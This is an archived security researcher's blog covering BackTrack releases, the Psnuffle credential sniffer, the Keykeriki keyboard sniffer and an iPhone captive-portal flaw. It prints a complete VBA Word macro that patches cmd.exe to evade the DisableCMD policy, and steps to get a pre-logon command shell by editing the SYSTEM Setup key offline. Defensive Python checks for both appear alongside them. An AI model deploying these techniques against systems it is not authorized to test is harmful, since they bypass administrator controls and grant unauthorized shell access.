Wednesday, February 10, 2010

Integrated blog into remote-exploit.org

Hey people, since BackTrack is now not on remote-exploit.org anymore, I decided to blog straight into the news area on the website, so please go to http://www.remote-exploit.org for new posts.

greetings

max

Thursday, December 10, 2009

18$ Gigabit ExpressCard Ethernet Works in Mac

Wow, I am amazed. I just found the time to plug the ExpressCard Ethernet adapter into my Mac.

Tada... it just works beautifully.. cool, for just $18 you can't go wrong.

http://www.dealextreme.com/details.dx/sku.16056

Tuesday, September 01, 2009

DisableCMD - History Repeating

Before I start: this is nothing new! Actually it has been known for many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)

During a pentest I needed to patch cmd.exe to ignore the DisableCMD policy setting. Nothing new, nothing special, but I needed to do it remotely and I had to use VBA/Word macros. Long story short, I decided to release the code, because it's nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher written to overcome the DisableCMD policy setting. Sorry, but I at least expected a fail-safe behaviour.

I am not any good at coding VBA, but it might save someone some time. I will add an example.doc on remote-exploit.org as well.

Sub patchcmd()
    ' Copies %WinDir%\system32\cmd.exe to %temp%\dmc.exe and overwrites one
    ' byte of the UTF-16LE string "DisableCMD" in the copy, so the policy
    ' lookup in the copy no longer matches the policy value name.
    Dim Sourcefile As String, Destfile As String, Windir As String, Tempdir As String
    Dim F1 As Integer, F2 As Integer
    ' Indices 0..18 hold "DisableCMD" as UTF-16LE (a NUL follows each character);
    ' bytepattern(19) is never set and stays 0, so the NUL after the last "D"
    ' is matched as well.
    Dim bytepattern(19) As Byte
    Dim WshShell As Object

    Set WshShell = CreateObject("WScript.Shell")
    Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
    Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

    bytepattern(0) = &H44 'D
    bytepattern(1) = &H0
    bytepattern(2) = &H69 'i
    bytepattern(3) = &H0
    bytepattern(4) = &H73 's
    bytepattern(5) = &H0
    bytepattern(6) = &H61 'a
    bytepattern(7) = &H0
    bytepattern(8) = &H62 'b
    bytepattern(9) = &H0
    bytepattern(10) = &H6C 'l
    bytepattern(11) = &H0
    bytepattern(12) = &H65 'e
    bytepattern(13) = &H0
    bytepattern(14) = &H43 'C
    bytepattern(15) = &H0
    bytepattern(16) = &H4D 'M
    bytepattern(17) = &H0
    bytepattern(18) = &H44 'D

    Dim fileoffset As Long      ' 1-based file position of the "D" starting a candidate match
    fileoffset = 0
    Dim patternoffset As Long   ' index into bytepattern while matching
    patternoffset = 0
    Dim gotbad As Boolean       ' set when a candidate match breaks off

    gotbad = False

    Sourcefile = Windir & "\system32\cmd.exe"
    Destfile = Tempdir & "\dmc.exe"

    Dim tmpbyte As Byte

    If Dir(Sourcefile) = "" Then Exit Sub
    FileCopy Sourcefile, Destfile
    F1 = FreeFile
    Open Sourcefile For Binary As F1

    F2 = FreeFile
    Open Destfile For Binary As F2

    ' Scan the original byte by byte; the copy is only written at the match.
    While Not EOF(F1)
        gotbad = False

        Get #F1, , tmpbyte
        If tmpbyte = bytepattern(patternoffset) Then
            fileoffset = (Seek(F1) - 1)

            While (gotbad = False)
                Get #F1, , tmpbyte
                patternoffset = patternoffset + 1
                If tmpbyte = bytepattern(patternoffset) Then
                    If patternoffset > 18 Then
                        'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
                        ' Replace the "a" of "DisableCMD" (fileoffset + 6) in the copy with "4".
                        Put #F2, fileoffset + 6, &H34
                        Close F1
                        Close F2
                        MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
                        End
                    End If
                Else
                    patternoffset = 0
                    gotbad = True
                End If
            Wend
        End If
    Wend
    Close F1
    Close F2
End Sub
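The defender-side counterpart of the patcher above is an integrity check: a plain substring search for "DisableCMD" misses a copy in which a single byte was changed, so the check has to look for near-matches too. The following Python is an added example, my code rather than anything from the original post; the byte buffers it scans are constructed stand-ins for an executable and nothing is read from disk.

```python
"""Integrity check for the UTF-16LE "DisableCMD" string in a binary image.

Added example: the sample buffers are constructed stand-ins for an executable.
"""
from dataclasses import dataclass
from typing import Optional

# The same 20 bytes the macro effectively compares: "DisableCMD" as UTF-16LE,
# including the NUL after the final "D".
DISABLECMD_UTF16 = "DisableCMD".encode("utf-16-le")


@dataclass
class Finding:
    offset: int       # byte offset of the window in the image
    mismatches: int   # bytes in the window that differ from the pattern
    observed: str     # the window decoded as UTF-16LE, for the report


def decode_window(window: bytes) -> str:
    return window.decode("utf-16-le", errors="replace")


def scan_for_pattern(data: bytes, pattern: bytes = DISABLECMD_UTF16,
                     max_mismatches: int = 2) -> Optional[Finding]:
    """Locate `pattern` exactly or, failing that, the closest near-match.

    A one-byte overwrite such as "Dis4bleCMD" defeats bytes.find(), so every
    window is compared byte for byte and the one with the fewest differences
    (at most `max_mismatches`) is reported.
    """
    exact = data.find(pattern)
    if exact != -1:
        return Finding(exact, 0, decode_window(data[exact:exact + len(pattern)]))

    best: Optional[Finding] = None
    plen = len(pattern)
    for off in range(len(data) - plen + 1):
        window = data[off:off + plen]
        diff = sum(1 for a, b in zip(window, pattern) if a != b)
        if diff <= max_mismatches and (best is None or diff < best.mismatches):
            best = Finding(off, diff, decode_window(window))
    return best


def classify(data: bytes) -> str:
    """Verdict for a monitoring job: 'intact', 'tampered' or 'absent'."""
    found = scan_for_pattern(data)
    if found is None:
        return "absent"
    return "intact" if found.mismatches == 0 else "tampered"


def build_sample(marker: str) -> bytes:
    """Constructed stand-in for an executable: filler around a UTF-16LE string table."""
    filler = bytes(range(256)) * 4
    table = ("SampleStringA\0" + marker + "\0SampleStringB\0").encode("utf-16-le")
    return filler + table + filler


if __name__ == "__main__":
    for marker in ("DisableCMD", "Dis4bleCMD", "SomethingElse"):
        image = build_sample(marker)
        found = scan_for_pattern(image)
        where = f"offset {found.offset}, saw {found.observed!r}" if found else "no match"
        print(f"{marker:14s} -> {classify(image):9s} ({where})")
```

Run against a copy of cmd.exe found in an unexpected place (the macro writes to %temp%), "tampered" with the observed text tells you exactly which character was changed; "absent" on a file that claims to be cmd.exe is equally worth a look.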

Monday, August 10, 2009

Psnuffle password sniffer for metasploit

I submitted a new version of the psnuffle credential sniffer addon to the Metasploit team. Until HDM has reviewed it and merged it into the SVN, I uploaded a tgz to remote-exploit.org's code section: http://www.remote-exploit.org/codes/psnuffle/psnuffle_rexploit_org_09082009.tar.gz Please note that it will be removed when it's officially available within the Metasploit SVN. Check out the demo video http://vimeo.com/6013518 if you'd like to see it in action. Currently I have included POP3, IMAP, FTP and an HTTP GET sniffer module. Modules are very simple to code, so I expect new ones every few days.

Psnuffle credentials sniffing module demo from Max Moser on Vimeo.

With psnuffle, Metasploit has a credential sniffer in place. It's easy to use and extend. Writing a new module just takes some minutes.

Monday, July 13, 2009

Keykeriki on the new PCB's

Today I just finished my first Keykeriki hardware on the professionally manufactured PCBs. When everything works fine, we can go into mass-production :-). There were no major problems during soldering, except that the pre-drilled holes for the antenna connector are too small. Simple to solve: either cut off the ground connectors and solder it directly onto the board, or file the legs/connectors to a smaller shape using a Dremel.

Monday, July 06, 2009

iUsability-Pwned!

Lothar informed me about a strange behaviour of the iPhone running OS 3. It seems the iPhone automatically opens a browser when joining a network. (See a video of the whole problem here: http://www.vimeo.com/5466236)

The iPhone tries to do the following:

1. DNS queries for www.apple.com
2. Opening http://www.apple.com/library/test/success.html

When both are successful, then fine... the phone gets back "Success" and everything is OK.
When both fail... that's fine as well, because then the phone assumes that the internet connection is not up and running.

BUT <-- isn't there always a BUT?!

If the phone can successfully query the name but gets back any content other than "Success", it assumes that there is a captive portal which requires you to authenticate first to get access to the internet.

This is true for many hotspots etc... so Apple was thinking.. damn, that's annoying for the user... let's open up Safari automatically if this special case comes into place :-)

Usability kills security .... together with karmetasploit it's a very evil thing. Get iPhone cookies, accounts and maybe even system control... depending on the bugs you have left to test.

You can see the whole thing as a video @vimeo http://www.vimeo.com/5466236 .... now let's find some new Safari bugs :-)
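The decision the phone makes, as an added Python model that is not part of the original post: the hostname, the probe URL and the expected "Success" body come from the description above, while the HTTP responses are constructed here (the markup of the genuine page is not reproduced, only a body whose visible text is "Success") so that each of the three outcomes can be exercised offline. Treating a resolved name with no HTTP answer at all as "offline" is my assumption; the post does not cover that case.

```python
"""Model of the iPhone connectivity probe described above (added example).

Hostname, path and the expected body come from the post; the raw HTTP
responses are constructed here to exercise each branch of the decision.
"""
import re
from enum import Enum
from typing import Optional, Tuple

PROBE_HOST = "www.apple.com"
PROBE_PATH = "/library/test/success.html"
EXPECTED_BODY = "Success"


class Verdict(Enum):
    ONLINE = "online"                  # DNS answered and the page says "Success"
    OFFLINE = "offline"                # DNS failed: the phone assumes no internet
    CAPTIVE_PORTAL = "captive-portal"  # DNS answered but the page differs: Safari opens


def parse_http_response(raw: bytes) -> Tuple[int, str]:
    """Split a raw HTTP/1.x response into (status code, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    try:
        status = int(status_line.split()[1])
    except (IndexError, ValueError):
        status = 0
    return status, body.decode("utf-8", errors="replace")


def visible_text(html: str) -> str:
    """Strip tags so '<HTML><BODY>Success</BODY></HTML>' compares as 'Success'."""
    return re.sub(r"<[^>]+>", "", html).strip()


def classify_probe(dns_resolved: bool, raw_response: Optional[bytes]) -> Verdict:
    """Reproduce the three outcomes the post describes.

    DNS failure is the 'both fail' case. A resolved name with no HTTP answer
    is not covered by the post; treating it as offline is an assumption.
    """
    if not dns_resolved or raw_response is None:
        return Verdict.OFFLINE
    status, body = parse_http_response(raw_response)
    if status == 200 and visible_text(body) == EXPECTED_BODY:
        return Verdict.ONLINE
    # Anything else (redirect to a login page, a page with a form, ...) is
    # read as a captive portal, and that is the branch that opens the browser.
    return Verdict.CAPTIVE_PORTAL


# Constructed responses, not captures.
GENUINE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
           b"<HTML><BODY>Success</BODY></HTML>")
PORTAL_REDIRECT = b"HTTP/1.1 302 Found\r\nLocation: http://portal.example/login\r\n\r\n"
PORTAL_INLINE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                 b"<html><body><form>Please log in</form></body></html>")


def run_scenarios():
    """Return the verdict for each constructed scenario."""
    return {
        "normal internet": classify_probe(True, GENUINE),
        "no dns": classify_probe(False, None),
        "hotspot redirect": classify_probe(True, PORTAL_REDIRECT),
        "hotspot login page": classify_probe(True, PORTAL_INLINE),
    }


if __name__ == "__main__":
    for name, verdict in run_scenarios().items():
        print(f"{name:20s} -> {verdict.value}")
```

The point the model makes visible is that the third branch is reached by any network that answers the DNS query and returns something other than the expected page: the check cannot tell a hotspot's login page from any other substituted content, which is why the automatic browser launch is the risky part.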

And thank you, Lothar, for the fish.

Tuesday, June 09, 2009

Keykeriki faux-pas

What a shame, we released the software package yesterday and removed the schematics at the same time. Sorry for that, both tar.gz's are now back on the website. Btw, we have about 80 TRF7900 receiver chips in stock; if someone wants to build a Keykeriki, just contact us by email.

greetz

max

Thursday, June 04, 2009

Keykeriki vs. Logitech Round 1

Here is a picture of the information gathered using my Keykeriki and an oscilloscope. This image shows the sequence patterns needed to implement the parser for Logitech keyboards. Important side note: Logitech uses standard Miller symbols, not the Microsoft variants.

If you don't know what Keykeriki is.. it's an open-source, universal wireless keyboard sniffing project. Checkout


Monday, June 01, 2009

27Mhz Wireless Keyboard Sniffer Released

1.5 years after releasing our whitepaper "27Mhz Wireless Keyboard Analysis Report" about wireless keyboard insecurities, we are proud to present the universal wireless keyboard sniffer: Keykeriki. This open-source hardware and software project enables everyone to verify the security level of their own keyboard transmissions, and/or demonstrate the sniffing attacks (for educational purposes only). The hardware itself is designed to be small and versatile; it can be extended to currently undetected/unknown keyboard traffic, and/or hardware extensions, for example a repeating module or amplifier. Check out http://www.remote-exploit.org/Keykeriki.html for further information, schematics and more. We will provide PCBs as soon as they are ready.

greetings

max

Monday, December 22, 2008

OSX 10.5.6 Mail crash and recover

Well, again we had a major security update on OS X. Guess what, yeah... Apple Mail terminates with a segmentation fault during startup.

After researching and debugging around on my system, I found out that the GPGMail bundle plugin was the problem. Uninstall that bundle from your $HOME/Library/Mail/Bundles directory.

Day saved... GPG back to the console, and over and out.

max

Tuesday, September 23, 2008

Locked yourself out of Vista?

During some computer hardening work I managed to lock myself out of the system completely. Unfortunately it is a standalone system, so re-applying a domain GPO was not possible. Also, the restrictive firewall settings and sharing configuration did not allow me to use any of the leet tricks like psexec, remote registry etc.

Because I still had physical access to the system, I tried to delete the .pol file on the system at c:\Windows\System32\GroupPolicyUsers\

So I was still locked out and was trying every trick I know... until I came up with this one:

1) Download the chntpw ISO at http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html
2) Boot the system with it and use the registry editor to go to the SYSTEM hive
3) cd into the Setup key
4) Edit the CmdLine value to cmd.exe
5) Edit the SetupType value to 2
6) Reboot and you will get a DOS box
7) Start mmc or gpedit.msc
8) Type Exit.

Coooool....

Thanks to the original idea poster over here: http://forums.techarena.in/windows-security/678964.htm
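Seen from the defender's side, the procedure above leaves a recognisable state in the SYSTEM hive: SetupType set to 2 and CmdLine pointing at a program, which is exactly what makes the command prompt appear at the next boot. The following Python is an added example, not code from the original post, that parses a Registry Editor 5.00 export of that key (constructed inline here and already decoded to text; real .reg files are UTF-16LE) and flags that state. The baseline it assumes, SetupType 0 and an empty CmdLine on a machine that has finished setup, is my assumption.

```python
"""Audit of the SYSTEM\\Setup key in a .reg export (added example).

The export texts below are constructed, not taken from a real system.
"""
import re
from typing import Dict, List, Union

RegValue = Union[str, int]
RegTree = Dict[str, Dict[str, RegValue]]

SETUP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\Setup"


def parse_reg(text: str) -> RegTree:
    """Parse the subset of .reg syntax needed here: [keys], "string" and dword values."""
    tree: RegTree = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            tree.setdefault(current, {})
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if current is None or not m:
            continue  # default values (@=) and unknown lines are not needed here
        name = m.group(1).replace('\\"', '"').replace("\\\\", "\\")
        rhs = m.group(2)
        if rhs.startswith("dword:"):
            tree[current][name] = int(rhs[len("dword:"):], 16)
        elif rhs.startswith('"') and rhs.endswith('"'):
            tree[current][name] = rhs[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        # hex:, hex(2): and other types are skipped; this check only needs the two above
    return tree


def audit_setup_key(tree: RegTree) -> List[str]:
    """Return findings for a Setup key that would run a command at next boot.

    Assumed baseline: SetupType 0 and an empty CmdLine once setup is complete.
    """
    findings: List[str] = []
    setup = tree.get(SETUP_KEY, {})
    setup_type = setup.get("SetupType", 0)
    cmdline = setup.get("CmdLine", "")
    if setup_type != 0:
        findings.append(f"SetupType is {setup_type} (expected 0): setup mode re-enabled")
    if cmdline:
        findings.append(f"CmdLine is {cmdline!r}: program runs before logon at next boot")
    return findings


# Constructed exports, not taken from a real system.
SUSPICIOUS_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"CmdLine"="cmd.exe"
"SetupType"=dword:00000002
"SystemSetupInProgress"=dword:00000000
"""

CLEAN_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"CmdLine"=""
"SetupType"=dword:00000000
"SystemSetupInProgress"=dword:00000000
"""

if __name__ == "__main__":
    for label, export in (("suspicious", SUSPICIOUS_EXPORT), ("clean", CLEAN_EXPORT)):
        print(label, audit_setup_key(parse_reg(export)) or ["no findings"])
```

Because the edit is made offline, nothing inside the running system logs it; an export or hive snapshot compared against this baseline, or a boot-time check that these two values are at their defaults, is the practical way to notice it afterwards.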

Monday, June 30, 2008

Over 150'000 downloads in about a week

Well, I think it is amazing how far this BackTrack project has come. We already have over 150'000 downloads since we released version 3 on June 19th. This does not include any unofficial mirrors and/or torrents that are available. Roughly this translates into over 100 Terabytes of data transmitted in ONE WEEK! When I see this number I wish I got just $1 for every download :-)

Anyway, I am impressed again and again by those numbers. For years we have kept the lines hot and the community able to test these great tools within an easy environment without the need for an installation. See you soon.

Wednesday, June 25, 2008

Even my mailbox praises me :-)

Lately, when I was checking my mail, I noticed a funny thing. Check out the number of messages :-) I must be a real hacker then, when even my mailbox praises me as 1337 :-)

See you later..same blog..different content

Friday, June 20, 2008

Backtrack 3 released today

I am proud to announce that we released BackTrack yesterday at the
interview with pauldotcom.

Muts, Martin and I have slaved for weeks and months, together with the
help of many remote-exploit'ers to bring you this fine release. As
usual, this version overshadows the previous ones with extra cool
things.

Nessus

Unfortunately, Tenable would not allow for redistribution of Nessus.

Saint
Fortunately, SAINT *has* provided BackTrack users with a functional
version of SAINT, pending a free request for an IP range license
through the SAINT website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego
v2.0 with a community license especially for BackTrack users. We would
like to thank Paterva for co-operating with us and allowing us to
feature this amazing tool in BackTrack.

Kernel
2.6.21.5. Yes, yes, stop whining....We had serious deliberations
concerning the BT3 kernel. We decided not to upgrade to a newer kernel
as wireless injection patches were not fully tested and verified. We
did not want to jeopardize the awesome wireless capabilities of BT3
for the sake of sexiness or slightly increased hardware
compatibilities. All relevant security patches have been applied.

Tools
As usual, updated, sharpened, SVN'ed and armed to the teeth. This
release we have some special features such as spoonwep, fastrack and
other cool additions.

Availability
For the first time we distribute three different versions of BackTrack 3:
- CD Version
- USB Version with Compiz
- VMWare version including the VMWTools and some special Addons

Final Requests
We request the community to not mirror or torrent this release, or
otherwise distribute it online without our knowledge. We are trying to
gather precise statistics about bt3 downloads. If you would like to
mirror BT3 then please:

1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.

Rants

Problems, fixes, bugs, opinions - should all end up in our Remote
Exploit community forums, and our wiki:

http://forums.remote-exploit.org
http://wiki.remote-exploit.org

Over and out,

Max, Muts, Martin